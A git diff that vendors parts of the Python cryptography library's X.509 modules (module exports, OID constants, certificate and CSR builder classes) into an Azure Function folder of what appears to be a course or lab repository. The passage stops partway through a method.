_ModuleWithDeprecations(module) + dv = _DeprecatedValue(value, message, warning_class) + # Maintain backwards compatibility with `name is None` for pyOpenSSL. + if name is not None: + setattr(module, name, dv) + return dv + + +def cached_property(func: typing.Callable) -> property: + cached_name = "_cached_{}".format(func) + sentinel = object() + + def inner(instance: object): + cache = getattr(instance, cached_name, sentinel) + if cache is not sentinel: + return cache + result = func(instance) + setattr(instance, cached_name, result) + return result + + return property(inner) + + +# Python 3.10 changed representation of enums. We use well-defined object +# representation and string representation from Python 3.9. +class Enum(enum.Enum): + def __repr__(self) -> str: + return f"<{self.__class__.__name__}.{self._name_}: {self._value_!r}>" + + def __str__(self) -> str: + return f"{self.__class__.__name__}.{self._name_}" diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/__init__.py new file mode 100644 index 0000000..658e19f --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/__init__.py @@ -0,0 +1,249 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +from cryptography.x509 import certificate_transparency +from cryptography.x509.base import ( + Attribute, + AttributeNotFound, + Attributes, + Certificate, + CertificateBuilder, + CertificateRevocationList, + CertificateRevocationListBuilder, + CertificateSigningRequest, + CertificateSigningRequestBuilder, + InvalidVersion, + RevokedCertificate, + RevokedCertificateBuilder, + Version, + load_der_x509_certificate, + load_der_x509_crl, + load_der_x509_csr, + load_pem_x509_certificate, + load_pem_x509_crl, + load_pem_x509_csr, + random_serial_number, +) +from cryptography.x509.extensions import ( + AccessDescription, + AuthorityInformationAccess, + AuthorityKeyIdentifier, + BasicConstraints, + CRLDistributionPoints, + CRLNumber, + CRLReason, + CertificateIssuer, + CertificatePolicies, + DeltaCRLIndicator, + DistributionPoint, + DuplicateExtension, + ExtendedKeyUsage, + Extension, + ExtensionNotFound, + ExtensionType, + Extensions, + FreshestCRL, + GeneralNames, + InhibitAnyPolicy, + InvalidityDate, + IssuerAlternativeName, + IssuingDistributionPoint, + KeyUsage, + NameConstraints, + NoticeReference, + OCSPNoCheck, + OCSPNonce, + PolicyConstraints, + PolicyInformation, + PrecertPoison, + PrecertificateSignedCertificateTimestamps, + ReasonFlags, + SignedCertificateTimestamps, + SubjectAlternativeName, + SubjectInformationAccess, + SubjectKeyIdentifier, + TLSFeature, + TLSFeatureType, + UnrecognizedExtension, + UserNotice, +) +from cryptography.x509.general_name import ( + DNSName, + DirectoryName, + GeneralName, + IPAddress, + OtherName, + RFC822Name, + RegisteredID, + UniformResourceIdentifier, + UnsupportedGeneralNameType, +) +from cryptography.x509.name import ( + Name, + NameAttribute, + RelativeDistinguishedName, +) +from cryptography.x509.oid import ( + AuthorityInformationAccessOID, + CRLEntryExtensionOID, + CertificatePoliciesOID, + ExtendedKeyUsageOID, + ExtensionOID, + NameOID, + ObjectIdentifier, + SignatureAlgorithmOID, +) + + +OID_AUTHORITY_INFORMATION_ACCESS = ExtensionOID.AUTHORITY_INFORMATION_ACCESS +OID_AUTHORITY_KEY_IDENTIFIER = ExtensionOID.AUTHORITY_KEY_IDENTIFIER +OID_BASIC_CONSTRAINTS = ExtensionOID.BASIC_CONSTRAINTS +OID_CERTIFICATE_POLICIES = ExtensionOID.CERTIFICATE_POLICIES +OID_CRL_DISTRIBUTION_POINTS = ExtensionOID.CRL_DISTRIBUTION_POINTS +OID_EXTENDED_KEY_USAGE = ExtensionOID.EXTENDED_KEY_USAGE +OID_FRESHEST_CRL = ExtensionOID.FRESHEST_CRL +OID_INHIBIT_ANY_POLICY = ExtensionOID.INHIBIT_ANY_POLICY +OID_ISSUER_ALTERNATIVE_NAME = ExtensionOID.ISSUER_ALTERNATIVE_NAME +OID_KEY_USAGE = ExtensionOID.KEY_USAGE +OID_NAME_CONSTRAINTS = ExtensionOID.NAME_CONSTRAINTS +OID_OCSP_NO_CHECK = ExtensionOID.OCSP_NO_CHECK +OID_POLICY_CONSTRAINTS = ExtensionOID.POLICY_CONSTRAINTS +OID_POLICY_MAPPINGS = ExtensionOID.POLICY_MAPPINGS +OID_SUBJECT_ALTERNATIVE_NAME = ExtensionOID.SUBJECT_ALTERNATIVE_NAME +OID_SUBJECT_DIRECTORY_ATTRIBUTES = ExtensionOID.SUBJECT_DIRECTORY_ATTRIBUTES +OID_SUBJECT_INFORMATION_ACCESS = ExtensionOID.SUBJECT_INFORMATION_ACCESS +OID_SUBJECT_KEY_IDENTIFIER = ExtensionOID.SUBJECT_KEY_IDENTIFIER + +OID_DSA_WITH_SHA1 = SignatureAlgorithmOID.DSA_WITH_SHA1 +OID_DSA_WITH_SHA224 = SignatureAlgorithmOID.DSA_WITH_SHA224 +OID_DSA_WITH_SHA256 = SignatureAlgorithmOID.DSA_WITH_SHA256 +OID_ECDSA_WITH_SHA1 = SignatureAlgorithmOID.ECDSA_WITH_SHA1 +OID_ECDSA_WITH_SHA224 = SignatureAlgorithmOID.ECDSA_WITH_SHA224 +OID_ECDSA_WITH_SHA256 = SignatureAlgorithmOID.ECDSA_WITH_SHA256 +OID_ECDSA_WITH_SHA384 = SignatureAlgorithmOID.ECDSA_WITH_SHA384 +OID_ECDSA_WITH_SHA512 = SignatureAlgorithmOID.ECDSA_WITH_SHA512 +OID_RSA_WITH_MD5 = SignatureAlgorithmOID.RSA_WITH_MD5 +OID_RSA_WITH_SHA1 = SignatureAlgorithmOID.RSA_WITH_SHA1 +OID_RSA_WITH_SHA224 = SignatureAlgorithmOID.RSA_WITH_SHA224 +OID_RSA_WITH_SHA256 = SignatureAlgorithmOID.RSA_WITH_SHA256 +OID_RSA_WITH_SHA384 = SignatureAlgorithmOID.RSA_WITH_SHA384 +OID_RSA_WITH_SHA512 = SignatureAlgorithmOID.RSA_WITH_SHA512 +OID_RSASSA_PSS = SignatureAlgorithmOID.RSASSA_PSS + +OID_COMMON_NAME = NameOID.COMMON_NAME +OID_COUNTRY_NAME = NameOID.COUNTRY_NAME +OID_DOMAIN_COMPONENT = NameOID.DOMAIN_COMPONENT +OID_DN_QUALIFIER = NameOID.DN_QUALIFIER +OID_EMAIL_ADDRESS = NameOID.EMAIL_ADDRESS +OID_GENERATION_QUALIFIER = NameOID.GENERATION_QUALIFIER +OID_GIVEN_NAME = NameOID.GIVEN_NAME +OID_LOCALITY_NAME = NameOID.LOCALITY_NAME +OID_ORGANIZATIONAL_UNIT_NAME = NameOID.ORGANIZATIONAL_UNIT_NAME +OID_ORGANIZATION_NAME = NameOID.ORGANIZATION_NAME +OID_PSEUDONYM = NameOID.PSEUDONYM +OID_SERIAL_NUMBER = NameOID.SERIAL_NUMBER +OID_STATE_OR_PROVINCE_NAME = NameOID.STATE_OR_PROVINCE_NAME +OID_SURNAME = NameOID.SURNAME +OID_TITLE = NameOID.TITLE + +OID_CLIENT_AUTH = ExtendedKeyUsageOID.CLIENT_AUTH +OID_CODE_SIGNING = ExtendedKeyUsageOID.CODE_SIGNING +OID_EMAIL_PROTECTION = ExtendedKeyUsageOID.EMAIL_PROTECTION +OID_OCSP_SIGNING = ExtendedKeyUsageOID.OCSP_SIGNING +OID_SERVER_AUTH = ExtendedKeyUsageOID.SERVER_AUTH +OID_TIME_STAMPING = ExtendedKeyUsageOID.TIME_STAMPING + +OID_ANY_POLICY = CertificatePoliciesOID.ANY_POLICY +OID_CPS_QUALIFIER = CertificatePoliciesOID.CPS_QUALIFIER +OID_CPS_USER_NOTICE = CertificatePoliciesOID.CPS_USER_NOTICE + +OID_CERTIFICATE_ISSUER = CRLEntryExtensionOID.CERTIFICATE_ISSUER +OID_CRL_REASON = CRLEntryExtensionOID.CRL_REASON +OID_INVALIDITY_DATE = CRLEntryExtensionOID.INVALIDITY_DATE + +OID_CA_ISSUERS = AuthorityInformationAccessOID.CA_ISSUERS +OID_OCSP = AuthorityInformationAccessOID.OCSP + +__all__ = [ + "certificate_transparency", + "load_pem_x509_certificate", + "load_der_x509_certificate", + "load_pem_x509_csr", + "load_der_x509_csr", + "load_pem_x509_crl", + "load_der_x509_crl", + "random_serial_number", + "Attribute", + "AttributeNotFound", + "Attributes", + "InvalidVersion", + "DeltaCRLIndicator", + "DuplicateExtension", + "ExtensionNotFound", + "UnsupportedGeneralNameType", + "NameAttribute", + "Name", + "RelativeDistinguishedName", + "ObjectIdentifier", + "ExtensionType", + "Extensions", + "Extension", + "ExtendedKeyUsage", + "FreshestCRL", + "IssuingDistributionPoint", + "TLSFeature", + "TLSFeatureType", + "OCSPNoCheck", + "BasicConstraints", + "CRLNumber", + "KeyUsage", + "AuthorityInformationAccess", + "SubjectInformationAccess", + "AccessDescription", + "CertificatePolicies", + "PolicyInformation", + "UserNotice", + "NoticeReference", + "SubjectKeyIdentifier", + "NameConstraints", + "CRLDistributionPoints", + "DistributionPoint", + "ReasonFlags", + "InhibitAnyPolicy", + "SubjectAlternativeName", + "IssuerAlternativeName", + "AuthorityKeyIdentifier", + "GeneralNames", + "GeneralName", + "RFC822Name", + "DNSName", + "UniformResourceIdentifier", + "RegisteredID", + "DirectoryName", + "IPAddress", + "OtherName", + "Certificate", + "CertificateRevocationList", + "CertificateRevocationListBuilder", + "CertificateSigningRequest", + "RevokedCertificate", + "RevokedCertificateBuilder", + "CertificateSigningRequestBuilder", + "CertificateBuilder", + "Version", + "OID_CA_ISSUERS", + "OID_OCSP", + "CertificateIssuer", + "CRLReason", + "InvalidityDate", + "UnrecognizedExtension", + "PolicyConstraints", + "PrecertificateSignedCertificateTimestamps", + "PrecertPoison", + "OCSPNonce", + "SignedCertificateTimestamps", + "SignatureAlgorithmOID", + "NameOID", +] diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..2576bfb Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/__pycache__/base.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/__pycache__/base.cpython-39.pyc new file mode 100644 index 0000000..7e424ba Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/__pycache__/base.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/__pycache__/certificate_transparency.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/__pycache__/certificate_transparency.cpython-39.pyc new file mode 100644 index 0000000..6e93c0a Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/__pycache__/certificate_transparency.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/__pycache__/extensions.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/__pycache__/extensions.cpython-39.pyc new file mode 100644 index 0000000..c9aad3f Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/__pycache__/extensions.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/__pycache__/general_name.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/__pycache__/general_name.cpython-39.pyc new file mode 100644 index 0000000..64a21e0 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/__pycache__/general_name.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/__pycache__/name.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/__pycache__/name.cpython-39.pyc new file mode 100644 index 0000000..0a51146 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/__pycache__/name.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/__pycache__/ocsp.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/__pycache__/ocsp.cpython-39.pyc new file mode 100644 index 0000000..f27cf91 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/__pycache__/ocsp.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/__pycache__/oid.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/__pycache__/oid.cpython-39.pyc new file mode 100644 index 0000000..ac670b1 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/__pycache__/oid.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/base.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/base.py new file mode 100644 index 0000000..99e324e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cryptography/x509/base.py @@ -0,0 +1,1090 @@ +# This file is dual licensed under the terms of the Apache License, Version +# 2.0, and the BSD License. See the LICENSE file in the root of this repository +# for complete details. + + +import abc +import datetime +import os +import typing + +from cryptography import utils +from cryptography.hazmat.bindings._rust import x509 as rust_x509 +from cryptography.hazmat.primitives import hashes, serialization +from cryptography.hazmat.primitives.asymmetric import ( + dsa, + ec, + ed25519, + ed448, + rsa, + x25519, + x448, +) +from cryptography.hazmat.primitives.asymmetric.types import ( + CERTIFICATE_ISSUER_PUBLIC_KEY_TYPES, + CERTIFICATE_PRIVATE_KEY_TYPES, + CERTIFICATE_PUBLIC_KEY_TYPES, +) +from cryptography.x509.extensions import ( + Extension, + ExtensionType, + Extensions, + _make_sequence_methods, +) +from cryptography.x509.name import Name, _ASN1Type +from cryptography.x509.oid import ObjectIdentifier + + +_EARLIEST_UTC_TIME = datetime.datetime(1950, 1, 1) + + +class AttributeNotFound(Exception): + def __init__(self, msg: str, oid: ObjectIdentifier) -> None: + super(AttributeNotFound, self).__init__(msg) + self.oid = oid + + +def _reject_duplicate_extension( + extension: Extension[ExtensionType], + extensions: typing.List[Extension[ExtensionType]], +) -> None: + # This is quadratic in the number of extensions + for e in extensions: + if e.oid == extension.oid: + raise ValueError("This extension has already been set.") + + +def _reject_duplicate_attribute( + oid: ObjectIdentifier, + attributes: typing.List[ + typing.Tuple[ObjectIdentifier, bytes, typing.Optional[int]] + ], +) -> None: + # This is quadratic in the number of attributes + for attr_oid, _, _ in attributes: + if attr_oid == oid: + raise ValueError("This attribute has already been set.") + + +def _convert_to_naive_utc_time(time: datetime.datetime) -> datetime.datetime: + """Normalizes a datetime to a naive datetime in UTC. + + time -- datetime to normalize. Assumed to be in UTC if not timezone + aware. + """ + if time.tzinfo is not None: + offset = time.utcoffset() + offset = offset if offset else datetime.timedelta() + return time.replace(tzinfo=None) - offset + else: + return time + + +class Attribute: + def __init__( + self, + oid: ObjectIdentifier, + value: bytes, + _type: int = _ASN1Type.UTF8String.value, + ) -> None: + self._oid = oid + self._value = value + self._type = _type + + @property + def oid(self) -> ObjectIdentifier: + return self._oid + + @property + def value(self) -> bytes: + return self._value + + def __repr__(self) -> str: + return "".format(self.oid, self.value) + + def __eq__(self, other: object) -> bool: + if not isinstance(other, Attribute): + return NotImplemented + + return ( + self.oid == other.oid + and self.value == other.value + and self._type == other._type + ) + + def __hash__(self) -> int: + return hash((self.oid, self.value, self._type)) + + +class Attributes: + def __init__( + self, + attributes: typing.Iterable[Attribute], + ) -> None: + self._attributes = list(attributes) + + __len__, __iter__, __getitem__ = _make_sequence_methods("_attributes") + + def __repr__(self) -> str: + return "".format(self._attributes) + + def get_attribute_for_oid(self, oid: ObjectIdentifier) -> Attribute: + for attr in self: + if attr.oid == oid: + return attr + + raise AttributeNotFound("No {} attribute was found".format(oid), oid) + + +class Version(utils.Enum): + v1 = 0 + v3 = 2 + + +class InvalidVersion(Exception): + def __init__(self, msg: str, parsed_version: int) -> None: + super(InvalidVersion, self).__init__(msg) + self.parsed_version = parsed_version + + +class Certificate(metaclass=abc.ABCMeta): + @abc.abstractmethod + def fingerprint(self, algorithm: hashes.HashAlgorithm) -> bytes: + """ + Returns bytes using digest passed. + """ + + @abc.abstractproperty + def serial_number(self) -> int: + """ + Returns certificate serial number + """ + + @abc.abstractproperty + def version(self) -> Version: + """ + Returns the certificate version + """ + + @abc.abstractmethod + def public_key(self) -> CERTIFICATE_PUBLIC_KEY_TYPES: + """ + Returns the public key + """ + + @abc.abstractproperty + def not_valid_before(self) -> datetime.datetime: + """ + Not before time (represented as UTC datetime) + """ + + @abc.abstractproperty + def not_valid_after(self) -> datetime.datetime: + """ + Not after time (represented as UTC datetime) + """ + + @abc.abstractproperty + def issuer(self) -> Name: + """ + Returns the issuer name object. + """ + + @abc.abstractproperty + def subject(self) -> Name: + """ + Returns the subject name object. + """ + + @abc.abstractproperty + def signature_hash_algorithm( + self, + ) -> typing.Optional[hashes.HashAlgorithm]: + """ + Returns a HashAlgorithm corresponding to the type of the digest signed + in the certificate. + """ + + @abc.abstractproperty + def signature_algorithm_oid(self) -> ObjectIdentifier: + """ + Returns the ObjectIdentifier of the signature algorithm. + """ + + @abc.abstractproperty + def extensions(self) -> Extensions: + """ + Returns an Extensions object. + """ + + @abc.abstractproperty + def signature(self) -> bytes: + """ + Returns the signature bytes. + """ + + @abc.abstractproperty + def tbs_certificate_bytes(self) -> bytes: + """ + Returns the tbsCertificate payload bytes as defined in RFC 5280. + """ + + @abc.abstractmethod + def __eq__(self, other: object) -> bool: + """ + Checks equality. + """ + + @abc.abstractmethod + def __hash__(self) -> int: + """ + Computes a hash. + """ + + @abc.abstractmethod + def public_bytes(self, encoding: serialization.Encoding) -> bytes: + """ + Serializes the certificate to PEM or DER format. + """ + + +# Runtime isinstance checks need this since the rust class is not a subclass. +Certificate.register(rust_x509.Certificate) + + +class RevokedCertificate(metaclass=abc.ABCMeta): + @abc.abstractproperty + def serial_number(self) -> int: + """ + Returns the serial number of the revoked certificate. + """ + + @abc.abstractproperty + def revocation_date(self) -> datetime.datetime: + """ + Returns the date of when this certificate was revoked. + """ + + @abc.abstractproperty + def extensions(self) -> Extensions: + """ + Returns an Extensions object containing a list of Revoked extensions. + """ + + +# Runtime isinstance checks need this since the rust class is not a subclass. +RevokedCertificate.register(rust_x509.RevokedCertificate) + + +class _RawRevokedCertificate(RevokedCertificate): + def __init__( + self, + serial_number: int, + revocation_date: datetime.datetime, + extensions: Extensions, + ): + self._serial_number = serial_number + self._revocation_date = revocation_date + self._extensions = extensions + + @property + def serial_number(self) -> int: + return self._serial_number + + @property + def revocation_date(self) -> datetime.datetime: + return self._revocation_date + + @property + def extensions(self) -> Extensions: + return self._extensions + + +class CertificateRevocationList(metaclass=abc.ABCMeta): + @abc.abstractmethod + def public_bytes(self, encoding: serialization.Encoding) -> bytes: + """ + Serializes the CRL to PEM or DER format. + """ + + @abc.abstractmethod + def fingerprint(self, algorithm: hashes.HashAlgorithm) -> bytes: + """ + Returns bytes using digest passed. + """ + + @abc.abstractmethod + def get_revoked_certificate_by_serial_number( + self, serial_number: int + ) -> typing.Optional[RevokedCertificate]: + """ + Returns an instance of RevokedCertificate or None if the serial_number + is not in the CRL. + """ + + @abc.abstractproperty + def signature_hash_algorithm( + self, + ) -> typing.Optional[hashes.HashAlgorithm]: + """ + Returns a HashAlgorithm corresponding to the type of the digest signed + in the certificate. + """ + + @abc.abstractproperty + def signature_algorithm_oid(self) -> ObjectIdentifier: + """ + Returns the ObjectIdentifier of the signature algorithm. + """ + + @abc.abstractproperty + def issuer(self) -> Name: + """ + Returns the X509Name with the issuer of this CRL. + """ + + @abc.abstractproperty + def next_update(self) -> typing.Optional[datetime.datetime]: + """ + Returns the date of next update for this CRL. + """ + + @abc.abstractproperty + def last_update(self) -> datetime.datetime: + """ + Returns the date of last update for this CRL. + """ + + @abc.abstractproperty + def extensions(self) -> Extensions: + """ + Returns an Extensions object containing a list of CRL extensions. + """ + + @abc.abstractproperty + def signature(self) -> bytes: + """ + Returns the signature bytes. + """ + + @abc.abstractproperty + def tbs_certlist_bytes(self) -> bytes: + """ + Returns the tbsCertList payload bytes as defined in RFC 5280. + """ + + @abc.abstractmethod + def __eq__(self, other: object) -> bool: + """ + Checks equality. + """ + + @abc.abstractmethod + def __len__(self) -> int: + """ + Number of revoked certificates in the CRL. + """ + + @typing.overload + def __getitem__(self, idx: int) -> RevokedCertificate: + ... + + @typing.overload + def __getitem__(self, idx: slice) -> typing.List[RevokedCertificate]: + ... + + @abc.abstractmethod + def __getitem__( + self, idx: typing.Union[int, slice] + ) -> typing.Union[RevokedCertificate, typing.List[RevokedCertificate]]: + """ + Returns a revoked certificate (or slice of revoked certificates). + """ + + @abc.abstractmethod + def __iter__(self) -> typing.Iterator[RevokedCertificate]: + """ + Iterator over the revoked certificates + """ + + @abc.abstractmethod + def is_signature_valid( + self, public_key: CERTIFICATE_ISSUER_PUBLIC_KEY_TYPES + ) -> bool: + """ + Verifies signature of revocation list against given public key. + """ + + +CertificateRevocationList.register(rust_x509.CertificateRevocationList) + + +class CertificateSigningRequest(metaclass=abc.ABCMeta): + @abc.abstractmethod + def __eq__(self, other: object) -> bool: + """ + Checks equality. + """ + + @abc.abstractmethod + def __hash__(self) -> int: + """ + Computes a hash. + """ + + @abc.abstractmethod + def public_key(self) -> CERTIFICATE_PUBLIC_KEY_TYPES: + """ + Returns the public key + """ + + @abc.abstractproperty + def subject(self) -> Name: + """ + Returns the subject name object. + """ + + @abc.abstractproperty + def signature_hash_algorithm( + self, + ) -> typing.Optional[hashes.HashAlgorithm]: + """ + Returns a HashAlgorithm corresponding to the type of the digest signed + in the certificate. + """ + + @abc.abstractproperty + def signature_algorithm_oid(self) -> ObjectIdentifier: + """ + Returns the ObjectIdentifier of the signature algorithm. + """ + + @abc.abstractproperty + def extensions(self) -> Extensions: + """ + Returns the extensions in the signing request. + """ + + @abc.abstractproperty + def attributes(self) -> Attributes: + """ + Returns an Attributes object. + """ + + @abc.abstractmethod + def public_bytes(self, encoding: serialization.Encoding) -> bytes: + """ + Encodes the request to PEM or DER format. + """ + + @abc.abstractproperty + def signature(self) -> bytes: + """ + Returns the signature bytes. + """ + + @abc.abstractproperty + def tbs_certrequest_bytes(self) -> bytes: + """ + Returns the PKCS#10 CertificationRequestInfo bytes as defined in RFC + 2986. + """ + + @abc.abstractproperty + def is_signature_valid(self) -> bool: + """ + Verifies signature of signing request. + """ + + @abc.abstractmethod + def get_attribute_for_oid(self, oid: ObjectIdentifier) -> bytes: + """ + Get the attribute value for a given OID. + """ + + +# Runtime isinstance checks need this since the rust class is not a subclass. +CertificateSigningRequest.register(rust_x509.CertificateSigningRequest) + + +# Backend argument preserved for API compatibility, but ignored. +def load_pem_x509_certificate( + data: bytes, backend: typing.Any = None +) -> Certificate: + return rust_x509.load_pem_x509_certificate(data) + + +# Backend argument preserved for API compatibility, but ignored. +def load_der_x509_certificate( + data: bytes, backend: typing.Any = None +) -> Certificate: + return rust_x509.load_der_x509_certificate(data) + + +# Backend argument preserved for API compatibility, but ignored. +def load_pem_x509_csr( + data: bytes, backend: typing.Any = None +) -> CertificateSigningRequest: + return rust_x509.load_pem_x509_csr(data) + + +# Backend argument preserved for API compatibility, but ignored. +def load_der_x509_csr( + data: bytes, backend: typing.Any = None +) -> CertificateSigningRequest: + return rust_x509.load_der_x509_csr(data) + + +# Backend argument preserved for API compatibility, but ignored. +def load_pem_x509_crl( + data: bytes, backend: typing.Any = None +) -> CertificateRevocationList: + return rust_x509.load_pem_x509_crl(data) + + +# Backend argument preserved for API compatibility, but ignored. +def load_der_x509_crl( + data: bytes, backend: typing.Any = None +) -> CertificateRevocationList: + return rust_x509.load_der_x509_crl(data) + + +class CertificateSigningRequestBuilder: + def __init__( + self, + subject_name: typing.Optional[Name] = None, + extensions: typing.List[Extension[ExtensionType]] = [], + attributes: typing.List[ + typing.Tuple[ObjectIdentifier, bytes, typing.Optional[int]] + ] = [], + ): + """ + Creates an empty X.509 certificate request (v1). + """ + self._subject_name = subject_name + self._extensions = extensions + self._attributes = attributes + + def subject_name(self, name: Name) -> "CertificateSigningRequestBuilder": + """ + Sets the certificate requestor's distinguished name. + """ + if not isinstance(name, Name): + raise TypeError("Expecting x509.Name object.") + if self._subject_name is not None: + raise ValueError("The subject name may only be set once.") + return CertificateSigningRequestBuilder( + name, self._extensions, self._attributes + ) + + def add_extension( + self, extval: ExtensionType, critical: bool + ) -> "CertificateSigningRequestBuilder": + """ + Adds an X.509 extension to the certificate request. + """ + if not isinstance(extval, ExtensionType): + raise TypeError("extension must be an ExtensionType") + + extension = Extension(extval.oid, critical, extval) + _reject_duplicate_extension(extension, self._extensions) + + return CertificateSigningRequestBuilder( + self._subject_name, + self._extensions + [extension], + self._attributes, + ) + + def add_attribute( + self, + oid: ObjectIdentifier, + value: bytes, + *, + _tag: typing.Optional[_ASN1Type] = None, + ) -> "CertificateSigningRequestBuilder": + """ + Adds an X.509 attribute with an OID and associated value. + """ + if not isinstance(oid, ObjectIdentifier): + raise TypeError("oid must be an ObjectIdentifier") + + if not isinstance(value, bytes): + raise TypeError("value must be bytes") + + if _tag is not None and not isinstance(_tag, _ASN1Type): + raise TypeError("tag must be _ASN1Type") + + _reject_duplicate_attribute(oid, self._attributes) + + if _tag is not None: + tag = _tag.value + else: + tag = None + + return CertificateSigningRequestBuilder( + self._subject_name, + self._extensions, + self._attributes + [(oid, value, tag)], + ) + + def sign( + self, + private_key: CERTIFICATE_PRIVATE_KEY_TYPES, + algorithm: typing.Optional[hashes.HashAlgorithm], + backend: typing.Any = None, + ) -> CertificateSigningRequest: + """ + Signs the request using the requestor's private key. + """ + if self._subject_name is None: + raise ValueError("A CertificateSigningRequest must have a subject") + return rust_x509.create_x509_csr(self, private_key, algorithm) + + +class CertificateBuilder: + _extensions: typing.List[Extension[ExtensionType]] + + def __init__( + self, + issuer_name: typing.Optional[Name] = None, + subject_name: typing.Optional[Name] = None, + public_key: typing.Optional[CERTIFICATE_PUBLIC_KEY_TYPES] = None, + serial_number: typing.Optional[int] = None, + not_valid_before: typing.Optional[datetime.datetime] = None, + not_valid_after: typing.Optional[datetime.datetime] = None, + extensions: typing.List[Extension[ExtensionType]] = [], + ) -> None: + self._version = Version.v3 + self._issuer_name = issuer_name + self._subject_name = subject_name + self._public_key = public_key + self._serial_number = serial_number + self._not_valid_before = not_valid_before + self._not_valid_after = not_valid_after + self._extensions = extensions + + def issuer_name(self, name: Name) -> "CertificateBuilder": + """ + Sets the CA's distinguished name. + """ + if not isinstance(name, Name): + raise TypeError("Expecting x509.Name object.") + if self._issuer_name is not None: + raise ValueError("The issuer name may only be set once.") + return CertificateBuilder( + name, + self._subject_name, + self._public_key, + self._serial_number, + self._not_valid_before, + self._not_valid_after, + self._extensions, + ) + + def subject_name(self, name: Name) -> "CertificateBuilder": + """ + Sets the requestor's distinguished name. + """ + if not isinstance(name, Name): + raise TypeError("Expecting x509.Name object.") + if self._subject_name is not None: + raise ValueError("The subject name may only be set once.") + return CertificateBuilder( + self._issuer_name, + name, + self._public_key, + self._serial_number, + self._not_valid_before, + self._not_valid_after, + self._extensions, + ) + + def public_key( + self, + key: CERTIFICATE_PUBLIC_KEY_TYPES, + ) -> "CertificateBuilder": + """ + Sets the requestor's public key (as found in the signing request). + """ + if not isinstance( + key, + ( + dsa.DSAPublicKey, + rsa.RSAPublicKey, + ec.EllipticCurvePublicKey, + ed25519.Ed25519PublicKey, + ed448.Ed448PublicKey, + x25519.X25519PublicKey, + x448.X448PublicKey, + ), + ): + raise TypeError( + "Expecting one of DSAPublicKey, RSAPublicKey," + " EllipticCurvePublicKey, Ed25519PublicKey," + " Ed448PublicKey, X25519PublicKey, or " + "X448PublicKey." + ) + if self._public_key is not None: + raise ValueError("The public key may only be set once.") + return CertificateBuilder( + self._issuer_name, + self._subject_name, + key, + self._serial_number, + self._not_valid_before, + self._not_valid_after, + self._extensions, + ) + + def serial_number(self, number: int) -> "CertificateBuilder": + """ + Sets the certificate serial number. + """ + if not isinstance(number, int): + raise TypeError("Serial number must be of integral type.") + if self._serial_number is not None: + raise ValueError("The serial number may only be set once.") + if number <= 0: + raise ValueError("The serial number should be positive.") + + # ASN.1 integers are always signed, so most significant bit must be + # zero. + if number.bit_length() >= 160: # As defined in RFC 5280 + raise ValueError( + "The serial number should not be more than 159 " "bits." + ) + return CertificateBuilder( + self._issuer_name, + self._subject_name, + self._public_key, + number, + self._not_valid_before, + self._not_valid_after, + self._extensions, + ) + + def not_valid_before( + self, time: datetime.datetime + ) -> "CertificateBuilder": + """ + Sets the certificate activation time. + """ + if not isinstance(time, datetime.datetime): + raise TypeError("Expecting datetime object.") + if self._not_valid_before is not None: + raise ValueError("The not valid before may only be set once.") + time = _convert_to_naive_utc_time(time) + if time < _EARLIEST_UTC_TIME: + raise ValueError( + "The not valid before date must be on or after" + " 1950 January 1)." + ) + if self._not_valid_after is not None and time > self._not_valid_after: + raise ValueError( + "The not valid before date must be before the not valid after " + "date." + ) + return CertificateBuilder( + self._issuer_name, + self._subject_name, + self._public_key, + self._serial_number, + time, + self._not_valid_after, + self._extensions, + ) + + def not_valid_after(self, time: datetime.datetime) -> 